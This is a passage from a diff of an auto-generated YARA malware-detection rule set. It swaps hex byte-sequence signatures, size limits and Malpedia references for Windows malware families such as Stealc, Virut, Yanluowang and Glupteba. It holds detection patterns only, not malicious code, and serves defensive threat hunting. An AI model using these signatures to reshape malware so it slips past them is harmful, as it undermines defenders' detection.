-		logic_hash = "319076565d49e1f1e3a8b65fbc8806c865eb0ef04dd1a893be86dfc9ed47d730"
+		logic_hash = "7c5f9810c1f84570570dc00d72da471119d3938e3544c5969df4af5e973862b8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119290,32 +119677,32 @@ rule MALPEDIA_Win_Adkoob_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c78514ffffffd2000000 8d8d20ffffff 898d08ffffff 898d0cffffff 33c9 898d04ffffff 898d10ffffff }
-		$sequence_1 = { 8b4ddc 41 894ddc 85c0 7485 57 e8???????? }
-		$sequence_2 = { 8b75f4 56 ff7510 8d45ec 51 50 8bcb }
-		$sequence_3 = { 8b85e4feffff c1e104 898dd0feffff 8b4010 8b7c0104 8bcf e8???????? }
-		$sequence_4 = { 8bf0 e8???????? 8b4d98 3b4da0 7407 6a0e e8???????? }
-		$sequence_5 = { 8bc6 8bcf 2b85ccbfffff 50 8d85f4bfffff 50 e8???????? }
-		$sequence_6 = { e8???????? 6a00 53 8d4c242c e8???????? 8b7c2454 b828010000 }
-		$sequence_7 = { 8bd9 56 57 895df0 8b03 8b7304 8945d4 }
-		$sequence_8 = { ff75e8 53 6a01 ff75e0 ffd6 85c0 7431 }
-		$sequence_9 = { e8???????? 8bf0 83c40c 85f6 0f85ea000000 8b45dc ff45d8 }
+		$sequence_0 = { 9c 8a4d02 9c 83ed02 }
+		$sequence_1 = { 9c ff3424 9c 9c 8f442440 66c70424ae36 ff742440 }
+		$sequence_2 = { 016e05 036e20 43 7465 47 d220 04b7 }
+		$sequence_3 = { 0fc1fd 8d6c2424 ff742408 80fd7b 81cf73a6238d 81ec98000000 }
+		$sequence_4 = { 8d881c2d4e65 660fbecb 57 660fc9 0f92c5 0fb6c9 53 }
+		$sequence_5 = { 66ffc1 f6d0 660fbec9 8a46ff 9c 66ffc9 }
+		$sequence_6 = { 9c 66ffc9 8a2c24 0fb6c0 }
+		$sequence_7 = { 660fbec2 660fb6c0 8b4500 e8???????? 661584f0 fec0 27 }
+		$sequence_8 = { 6c 785f 007d3f cf }
+		$sequence_9 = { 3d0d351d11 0531250968 b3af 7c00 e8???????? }
 
 	condition:
-		7 of them and filesize < 1867776
+		7 of them and filesize < 8060928
 }
-rule MALPEDIA_Win_Dimnie_Auto : FILE
+rule MALPEDIA_Win_Virut_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a82e9816-e911-5906-b4fb-5ab4ee56af42"
+		id = "c8349287-bd2e-52b4-9752-e7bc4edd95a7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dimnie"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dimnie_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.virut_auto.yar#L1-L172"
 		license_url = "N/A"
-		logic_hash = "4f084852c71be42252e84f78f5c5fbeea9af651580f68857653ee5cb5f11e6f5"
+		logic_hash = "a48ac1b971086542095b7fb3caa9f795a6530b3c7c59d9de9bb3d487eade9d56"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119329,32 +119716,38 @@ rule MALPEDIA_Win_Dimnie_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2b5508 83fa01 751c 0f31 }
-		$sequence_1 = { 7605 8b450c eb54 8b550c 2b5508 83fa01 751c }
-		$sequence_2 = { 8855ae eb04 c645ae3d 8b450c }
-		$sequence_3 = { 890a 8b4510 8b08 83e107 }
-		$sequence_4 = { 8b4d08 3b4d0c 7605 8b450c eb54 8b550c 2b5508 }
-		$sequence_5 = { c70101000000 8b5510 c70201000000 8b4508 8b08 }
-		$sequence_6 = { c1e804 8945f4 8b4df8 83c101 8b45f4 33d2 f7f1 }
-		$sequence_7 = { c745fc00000000 c745f800000000 c745f850000000 8b450c }
-		$sequence_8 = { 8b5510 c70201000000 8b4508 8b08 83e10f }
-		$sequence_9 = { 83c101 8b45f4 33d2 f7f1 }
+		$sequence_0 = { 8d8424d0000000 50 ffd6 83f8ff 0f8573030000 6800100000 }
+		$sequence_1 = { 2bce 6a00 51 56 53 }
+		$sequence_2 = { 81e300f0ff0f 51 53 6a00 }
+		$sequence_3 = { b108 e8???????? 6894000000 5e 2be6 893424 }
+		$sequence_4 = { 290c24 8b7224 59 03f3 8b521c }
+		$sequence_5 = { 745b 50 54 6804010000 57 }
+		$sequence_6 = { cd2e 83f800 7c19 60 e8???????? 8b542430 5d }
+		$sequence_7 = { 42 3ac3 75f6 8d8424d0010000 50 }
+		$sequence_8 = { 8b35???????? 53 8d442444 50 }
+		$sequence_9 = { 3acb 7423 8bf8 8ac1 2c30 3c09 7719 }
+		$sequence_10 = { ab 6a10 8d45ec 50 53 }
+		$sequence_11 = { 53 6a05 8bcc 50 8bd4 50 }
+		$sequence_12 = { 0f31 03c2 a3???????? ff15???????? a3???????? 8d8424e0030000 }
+		$sequence_13 = { 2e44 4c 4c 00ff 95 }
+		$sequence_14 = { 56 8d442444 53 50 e8???????? 33c0 8d7c243c }
+		$sequence_15 = { 803f4d 0f85f9000000 807f015a 0f85ef000000 885c2420 885c2421 885c2422 }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Unidentified_071_Auto : FILE
+rule MALPEDIA_Win_Stealc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "518d209c-e627-5ef3-9eb6-1a7ee7d67ffa"
+		id = "a9a3385f-b9f5-5cec-b139-7fd9ab3e38ee"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_071"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_071_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stealc_auto.yar#L1-L112"
 		license_url = "N/A"
-		logic_hash = "10aa474e67246e989615e8f1a539e8beccbe5f2115f19e32be1e24db8d548303"
+		logic_hash = "1bbc82a373b409e3dad4afed525c9d3527cdf24f15e799642d4692134ce52442"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119368,32 +119761,32 @@ rule MALPEDIA_Win_Unidentified_071_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 83fa2b 8bce 0f45c8 33ed 83fa30 894c2428 }
-		$sequence_1 = { 740e 8b4d0c ff31 8bc8 e8???????? 8bc8 8b4508 }
-		$sequence_2 = { a3???????? ff7518 8d45dc 50 ff7510 }
-		$sequence_3 = { c20800 e8???????? cc 8b4c2404 53 8b5c2410 55 }
-		$sequence_4 = { 53 89442418 e8???????? 8bf0 83c8ff 8d4e01 81f9ffffff7f }
-		$sequence_5 = { 8b4304 8d48ff d3e6 03f6 }
-		$sequence_6 = { 8b33 56 55 e8???????? 8d047d02000000 89742418 }
-		$sequence_7 = { 84c0 750b 83c618 57 8bce }
-		$sequence_8 = { e8???????? 8b442424 83c410 c6042b00 83f810 7234 }
-		$sequence_9 = { 2bc1 894c2404 3bc2 0f82a9000000 8b4314 55 }
+		$sequence_0 = { e8???????? 83c460 e8???????? 83c40c }
+		$sequence_1 = { ff15???????? 85c0 7507 c685e0feffff43 }
+		$sequence_2 = { e8???????? e8???????? 83c418 6a3c }
+		$sequence_3 = { 50 e8???????? e8???????? 83c474 }
+		$sequence_4 = { e8???????? e8???????? 81c480000000 e9???????? }
+		$sequence_5 = { 68???????? e8???????? e8???????? 83c474 }
+		$sequence_6 = { 50 e8???????? e8???????? 81c484000000 }
+		$sequence_7 = { 8d45fc 50 ff75f4 e8???????? 59 59 8d85f0feffff }
+		$sequence_8 = { b9e8030000 33c0 f3aa 8d850ca5ffff 8945fc 8b7dfc b9e8030000 }
+		$sequence_9 = { 8d75f4 e8???????? 8b45d0 e8???????? 8d7de8 8d75d0 }
 
 	condition:
-		7 of them and filesize < 1220608
+		7 of them and filesize < 4891648
 }
-rule MALPEDIA_Win_Miniasp_Auto : FILE
+rule MALPEDIA_Win_Bolek_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f347c9b8-8bc2-5051-8759-9c4a71c6ee76"
+		id = "15e34de8-623e-5f2f-9d4c-c44b8f35819d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniasp"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.miniasp_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bolek_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "dc054826603e4c65732efe9c4e870d0e5d57b1e034ff76fb6ca9b268c587f33f"
+		logic_hash = "403a7b71c7f1728fba717836e961ac65b351f821c9556b0d1663304cb6494bb7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119407,32 +119800,32 @@ rule MALPEDIA_Win_Miniasp_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83a5e8fbffff00 83a5f4fbffff00 8b85bcfbffff 83b81404000000 740f 8b85bcfbffff 83b814040000ff }
-		$sequence_1 = { c645fb00 8b45ec ffb098000000 6a00 8b45ec ffb0a4000000 8b45ec }
-		$sequence_2 = { 48 8985fcddffff 8b85fcddffff 8a4001 8885fbddffff ff85fcddffff 80bdfbddffff00 }
-		$sequence_3 = { be???????? f3a5 a4 8b45bc 8b8098000000 48 8945a8 }
-		$sequence_4 = { 2b856cffffff 898564ffffff 7507 32c0 e9???????? ff7510 ff750c }
-		$sequence_5 = { 83ec18 894de8 6800c80000 e8???????? 59 8945fc }
-		$sequence_6 = { ff7508 6a00 ff15???????? 85c0 7505 }
-		$sequence_7 = { f3a4 8b4508 898550deffff 8b8550deffff 89854cdeffff 8b8550deffff 8a00 }
-		$sequence_8 = { 68???????? 64a100000000 50 51 51 83ec34 53 }
-		$sequence_9 = { 6804010000 e8???????? 59 8945d4 8b45d4 8945ec }
+		$sequence_0 = { ffd3 8b45d8 83c40c 0345fc ff75dc ff75f8 50 }
+		$sequence_1 = { 8945ec 85db 744e 48 83c624 f7d0 03fe }
+		$sequence_2 = { eb16 8bc7 8bce c1e110 c1e810 03c1 8d4a01 }
+		$sequence_3 = { e8???????? 83c41c ff75f8 ff15???????? 50 ff15???????? 8b4520 }
+		$sequence_4 = { ff760c e8???????? ff760c e8???????? ff7610 e8???????? 837e1400 }
+		$sequence_5 = { 85c0 0f8432020000 8b75f0 85f6 0f8427020000 56 6a04 }
+		$sequence_6 = { 85c0 7e06 03d8 2bf8 75ea 85ff 751a }
+		$sequence_7 = { ff7610 896c242c 894c2428 e8???????? 83c418 85c0 0f8882000000 }
+		$sequence_8 = { 8955ec 33c9 8945e8 51 50 51 51 }
+		$sequence_9 = { ff742428 6810270000 57 55 53 e8???????? 8bd0 }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 892928
 }
-rule MALPEDIA_Win_Sienna_Purple_Auto : FILE
+rule MALPEDIA_Win_Poohmilk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bf81e591-f4a8-52d6-a4ec-5bf5ebf65e21"
+		id = "9a12885d-67d3-50cd-a04d-3dc337c01cc8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sienna_purple"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sienna_purple_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.poohmilk_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "7480d66d62837df5528ba634142a2c05768c45916ca5058033314d20ebc94573"
+		logic_hash = "f0431f01a34a1352435470a98d80c3656cef1cd2a7cc3eb4ac4c25c7f03235a9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119446,32 +119839,32 @@ rule MALPEDIA_Win_Sienna_Purple_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c7460404000000 8b4604 bb04000000 03c1 c745fc00000000 33c9 f7e3 }
-		$sequence_1 = { 81fe04020000 0f8321010000 888435ecfdffff 8d4601 3d04020000 0f830c010000 c68405ecfdffff00 }
-		$sequence_2 = { e8???????? 84c0 0f8481000000 8d8d1cffffff e8???????? 6a3a 50 }
-		$sequence_3 = { e8???????? 837e0c00 7427 807e1000 7421 6a28 8bcb }
-		$sequence_4 = { e8???????? 85c0 0f84ff010000 6a00 8bc8 e8???????? 8bf8 }
-		$sequence_5 = { d1ff 8bc7 897584 89bd6cffffff c7459c00000000 c7458c70105000 251f000080 }
-		$sequence_6 = { e8???????? 8bb570ffffff 8a03 03f7 ff8578ffffff 8807 803e00 }
-		$sequence_7 = { 8d4e10 e8???????? 83f803 0f86f3000000 0f57c0 c745ec00000000 8d4dd4 }
-		$sequence_8 = { e9???????? 3c13 7516 6893000000 68ce000000 8bce e8???????? }
-		$sequence_9 = { 8bec 57 8b7d08 8b4708 85c0 7503 5f }
+		$sequence_0 = { f4 98 40 0020 99 40 00449940 }
+		$sequence_1 = { 3b8de4efffff 7405 83f901 7577 8b502a }
+		$sequence_2 = { 74dc 8bb5acfdffff 8bc6 0b85b0fdffff }
+		$sequence_3 = { 33ff 397e38 0f8583000000 397e14 757e 397e1c }
+		$sequence_4 = { 8bd6 0bd7 0f85ae000000 8b9570d2ffff 8b5238 }
+		$sequence_5 = { 6880000000 6a03 6a00 6a07 6800000080 56 ff15???????? }
+		$sequence_6 = { 0f8574020000 0fb79d02f0ffff 0fb79500f0ffff 895e10 3bda 0f855b020000 }
+		$sequence_7 = { 7425 56 ff15???????? 8b856cf3ffff }
+		$sequence_8 = { ffd3 8d85a0f3ffff 50 8d8decfdffff 51 ffd3 }
+		$sequence_9 = { ffd3 6a00 8d85ecfdffff 50 }
 
 	condition:
-		7 of them and filesize < 2930688
+		7 of them and filesize < 245760
 }
-rule MALPEDIA_Win_Lookback_Auto : FILE
+rule MALPEDIA_Win_Yanluowang_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7580e9e2-80f6-511a-b25c-1dcedd746da6"
+		id = "80b6830b-5b54-5c8d-ad9b-1e91ef44f5d3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lookback"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lookback_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yanluowang"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.yanluowang_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "23f3d5d64aa0691d5c11d11eeaa6c946ceb564753a29d81b27fd2ba0df02b692"
+		logic_hash = "6212a7300d814763a89ad52de44e628c3e76a732777f6c6e8d98550e60e1baf9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119485,32 +119878,32 @@ rule MALPEDIA_Win_Lookback_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 32d9 881c38 40 fec2 }
-		$sequence_1 = { 50 55 896b04 e8???????? 8b4c242c 8b542430 }
-		$sequence_2 = { ffd3 393d???????? 75af eb24 8b0d???????? 51 eb0f }
-		$sequence_3 = { 81fe00300000 7512 8b31 25ff0f0000 03c6 8bf7 }
-		$sequence_4 = { c644240800 88442415 e8???????? 8d4c240c 89442408 51 }
-		$sequence_5 = { 56 ff15???????? 817c240c1c010000 7515 8bbc2438020000 }
-		$sequence_6 = { 0f8407020000 8b35???????? 57 57 57 57 ffd6 }
-		$sequence_7 = { 52 8d442418 57 50 68???????? 57 57 }
-		$sequence_8 = { 55 8bec 51 53 c745fc00000000 b801000000 0fa2 }
-		$sequence_9 = { 56 57 6880020000 8901 c744241480020000 66894104 e8???????? }
+		$sequence_0 = { 7416 8bc2 8bca 83e03f c1f906 6bc030 03048d38034600 }
+		$sequence_1 = { 74da 83e801 74d5 83e801 0f85a5fdffff 0fbe41ff 8d04c560984400 }
+		$sequence_2 = { 668945e8 8b45d4 886de5 8b148538034600 8a4c1a2d f6c104 7419 }
+		$sequence_3 = { 69f307536554 8b55cc 8d1c0f 8b45b4 c1c208 0fb6c0 }
+		$sequence_4 = { 68???????? 51 50 8d45a4 50 ffb5e4fcffff 8d8d3cffffff }
+		$sequence_5 = { 8d8dc0eeffff e8???????? c645fc18 b8ffffff7f 8b8dd0eeffff 2bc1 83f830 }
+		$sequence_6 = { ff75b8 ff75c8 e8???????? 6a00 6a00 }
+		$sequence_7 = { 8ad8 83fa10 722c 8b4ddc 42 8bc1 81fa00100000 }
+		$sequence_8 = { 388557f4ffff 7431 8b85c0f5ffff 8d8d98f5ffff 51 3b85c4f5ffff 7410 }
+		$sequence_9 = { 8b4f50 8bf1 8b55ac 8b4754 8b7f58 8b525c 0bca }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 834560
 }
-rule MALPEDIA_Win_Glupteba_Auto : FILE
+rule MALPEDIA_Win_Grimplant_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d40588ac-e7a2-58c9-9ca8-ed52b13d9b71"
+		id = "00b5fa06-fa9c-594f-a510-4c191fcf8f32"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.glupteba_auto.yar#L1-L160"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimplant"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.grimplant_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "aabdfe0b9a7f1b7f6f6d9d5fd0bc40fb64823f7ef8d103971b20ab4de2b081ab"
+		logic_hash = "cbccd823b10050710a9d07b6e6e07157320e71de997cbe30ef0383cab26da835"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119524,40 +119917,34 @@ rule MALPEDIA_Win_Glupteba_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 ff15???????? 8d45d4 50 e8???????? 50 8d45d4 }
-		$sequence_1 = { 0fb6c8 8bc1 c1e804 0bc1 40 d1f8 }
-		$sequence_2 = { 83c0fc 33c9 85c0 7e0e 813c310d0a0d0a 7409 }
-		$sequence_3 = { ff15???????? ff75ee ff15???????? 830bff ff45fc 8b45fc }
-		$sequence_4 = { 50 68???????? e8???????? 83c420 e8???????? 5f 5e }
-		$sequence_5 = { eb02 8a03 8807 47 }
-		$sequence_6 = { 0bca 8b55fc c1ea07 c1e109 8d1c3f 0bd3 }
-		$sequence_7 = { c1eb08 33f3 8b5dfc 33df }
-		$sequence_8 = { 0106 830702 392e 75a0 }
-		$sequence_9 = { 00cd 3e46 005e3e 46 }
-		$sequence_10 = { 0012 3f 46 008bff558bec }
-		$sequence_11 = { 0107 eb4d 8b02 89442418 }
-		$sequence_12 = { 005e3e 46 00ff 3e46 }
-		$sequence_13 = { 00ff 3e46 0012 3f }
-		$sequence_14 = { 0101 03d3 8b4620 8bcb }
-		$sequence_15 = { 00f1 3d46005e3e 46 00cd }
+		$sequence_0 = { eb3d 0f108424a8000000 0f11842468010000 4c8b942480000000 488b542438 4c8b642430 488b842490000000 }
+		$sequence_1 = { e8???????? 90 88442418 885c2419 884c241a 48897c2420 4889742428 }
+		$sequence_2 = { ffd1 488bac2460010000 4881c468010000 c3 488b842470010000 6690 e8???????? }
+		$sequence_3 = { eb0f 4889c7 488d1537941c00 e8???????? 488d053cdd1300 488b9c24c0000000 488d0d15f31e00 }
+		$sequence_4 = { ffd2 4885db 0f8ec4000000 488b4c2470 488b5130 488b442478 ffd2 }
+		$sequence_5 = { e8???????? 488b942490000000 48895010 833d????????00 7517 488bb42498000000 48897018 }
+		$sequence_6 = { ffd1 b905000000 4889c7 4889de 31c0 488d1de47e3900 e8???????? }
+		$sequence_7 = { eb20 488d7830 488b4c2470 0f1f440000 e8???????? 488b7c2440 e8???????? }
+		$sequence_8 = { 8d0cc9 8d4940 48c1e906 4801c1 488b542438 48010a b801000000 }
+		$sequence_9 = { eb23 4889c1 48c1e004 488d15882e9000 48c7040200000000 48c744020800000000 488d4101 }
 
 	condition:
-		7 of them and filesize < 1417216
+		7 of them and filesize < 19940352
 }
-rule MALPEDIA_Win_Cryptbot_Auto : FILE
+rule MALPEDIA_Win_Nitlove_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a8c726cc-365c-50aa-acf5-f55e8b642760"
+		id = "b0d01298-0d5a-55f1-9d4e-e8ef0815c02e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cryptbot_auto.yar#L1-L208"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nitlove_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "47b1a044cb1a45373d0f5744b4acc6b2f29c9cc05af6ad96b3c4efc10032c638"
+		logic_hash = "39f2491a6c684fee2e407b59de9df647d75dd52440711335af5e0d5784c94ebd"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -119569,45 +119956,32 @@ rule MALPEDIA_Win_Cryptbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 85ed 0f94c0 8be8 }
-		$sequence_1 = { e9???????? b944dc0000 e9???????? b964dc0000 e9???????? b95ddc0000 e9???????? }
-		$sequence_2 = { e9???????? b949dc0000 e9???????? b944dc0000 e9???????? }
-		$sequence_3 = { e8???????? 85c0 750f b955960100 e8???????? e9???????? }
-		$sequence_4 = { 0f9cc0 eb02 32c0 84c0 }
-		$sequence_5 = { eb0c b99fed0000 e8???????? 8907 }
-		$sequence_6 = { e8???????? 85c0 750e b9ca070200 e8???????? 8bc8 }
-		$sequence_7 = { 33c0 eb0a b917d90000 e8???????? }
-		$sequence_8 = { 1ac9 2403 80e110 8ad1 3c02 7509 }
-		$sequence_9 = { 743a 833902 7c35 8b442410 }
-		$sequence_10 = { 7419 8b542408 83fa01 7c10 0fbf4846 3bd1 }
-		$sequence_11 = { 740d 8bce e8???????? 8b4c2424 8901 }
-		$sequence_12 = { 7416 8b4210 83786000 750d }
-		$sequence_13 = { 744e 0fb74802 83e103 3bcb }
-		$sequence_14 = { 7422 8b0e b201 e8???????? }
-		$sequence_15 = { 8b4d0c 8b09 89ce bf00000000 }
-		$sequence_16 = { 8b4d08 8b4974 8b09 8901 }
-		$sequence_17 = { 8b4d0c 8901 895104 c745fc02000000 }
-		$sequence_18 = { 8b4d08 8b9584000000 8b85a0000000 899c249c000000 }
-		$sequence_19 = { 8b4d0c 898d4cffffff 8b55c8 899548ffffff }
-		$sequence_20 = { 8b4d0c 898c249c000000 8b4d10 898c2498000000 }
-		$sequence_21 = { 8b4d08 8b4978 8b19 89542408 }
-		$sequence_22 = { 8b4d0c 8b09 01f0 11fa }
+		$sequence_0 = { ffd0 8d85c4fdffff baeb9b12fe 50 }
+		$sequence_1 = { 50 8bd6 e8???????? ffd0 83c40c 8d85fcfcffff }
+		$sequence_2 = { ba8be20580 b9???????? e8???????? ffd0 85f6 7451 }
+		$sequence_3 = { ffd0 8b45d0 85c0 7452 8b75fc 897ddc 2bf7 }
+		$sequence_4 = { 7d07 46 8bfe 3bf3 }
+		$sequence_5 = { e8???????? ffd0 8b15???????? 8bf0 8d45fc }
+		$sequence_6 = { 56 57 8d859cfeffff c745a444000000 68???????? 50 baeb9b12fe }
+		$sequence_7 = { 83f80e 7c43 8d4d08 e8???????? }
+		$sequence_8 = { ebeb 0fb64608 48 740c 48 740c }
+		$sequence_9 = { 8955fc 8b473c 8b443878 03c7 8b481c 03cf 894dec }
 
 	condition:
-		7 of them and filesize < 17138688
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_H1N1_Auto : FILE
+rule MALPEDIA_Win_Magala_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4f9432ad-24eb-5be0-8c5c-f54b004537b1"
+		id = "dd5a4c9f-df80-534d-9f59-9c3cdf877b1e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.h1n1"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.h1n1_auto.yar#L1-L177"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.magala"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.magala_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "e395b19b788b5872e8b41a06c72576193d2b704eacffdfa539ea6dd0de9a681c"
+		logic_hash = "e8f124f03a02dce9fd7ad1355c64c37bef0ae56bc832afec7217c51b4b91da06"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119621,38 +119995,32 @@ rule MALPEDIA_Win_H1N1_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7513 83bdecfeffff01 750a bb06000000 e9???????? 83bde8feffff06 }
-		$sequence_1 = { c7459044000000 8d4580 8d4d90 50 51 6a00 }
-		$sequence_2 = { 807dfe01 0f85d0000000 83bde8feffff05 750f 83bdecfeffff00 }
-		$sequence_3 = { 0bc0 0f84da010000 fc 8b7508 8b7df4 8b4b54 }
-		$sequence_4 = { 83bde8feffff06 7510 83bdecfeffff00 7507 bb05000000 eb17 }
-		$sequence_5 = { c745ac01000000 c745b010000000 c745b402000000 c745b820000000 }
-		$sequence_6 = { 50 ff75fc 6801000080 ff35???????? 58 ffd0 0bc0 }
-		$sequence_7 = { ab 05befa383a ab 352e1c3a58 ab ff75fc }
-		$sequence_8 = { ff15???????? 8bf0 85f6 745d 688c6e0010 56 }
-		$sequence_9 = { c1e908 330c85908f0010 42 3b54240c 72e4 f7d1 8bc1 }
-		$sequence_10 = { 59 59 c3 56 8b742408 6804010000 68f8820010 }
-		$sequence_11 = { 7620 8b742408 0fb60432 33c1 25ff000000 c1e908 330c85908f0010 }
-		$sequence_12 = { ff74242c b9686e0010 68546e0010 ff742430 b8606e0010 0f44c1 }
-		$sequence_13 = { 8b442404 33d2 a3???????? 42 b9c0850010 }
-		$sequence_14 = { 8d8578fdffff 50 68fc600010 6804010000 }
-		$sequence_15 = { 8d85f0fdffff 68dc600010 6804010000 50 e8???????? 83c414 8d45fc }
+		$sequence_0 = { 8bf8 c7461000000000 c746140f000000 c60600 837f1410 }
+		$sequence_1 = { 57 51 8bf9 c785e8feffff00000000 50 }
+		$sequence_2 = { 8b450c ff7508 03c3 03c2 50 8b4510 03c3 }
+		$sequence_3 = { 8bfb 8b75c4 85f6 7432 8b4dcc b853d9de75 2bce }
+		$sequence_4 = { 8985ecfdffff ff15???????? 8bf0 89b5f0fdffff 85f6 0f847f000000 }
+		$sequence_5 = { 8bf1 0f42f8 8b4e10 8bc1 f7d0 3bc7 0f86de000000 }
+		$sequence_6 = { 8bf0 3bfe 7445 8bcf e8???????? }
+		$sequence_7 = { e8???????? 8b06 83c408 5e 85c0 7510 68???????? }
+		$sequence_8 = { 0f1f440000 56 68???????? e8???????? }
+		$sequence_9 = { 8955fc 7202 8b00 837f1410 7204 8b0f eb02 }
 
 	condition:
-		7 of them and filesize < 172032
+		7 of them and filesize < 589824
 }
-rule MALPEDIA_Win_Pitou_Auto : FILE
+rule MALPEDIA_Win_Typeframe_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
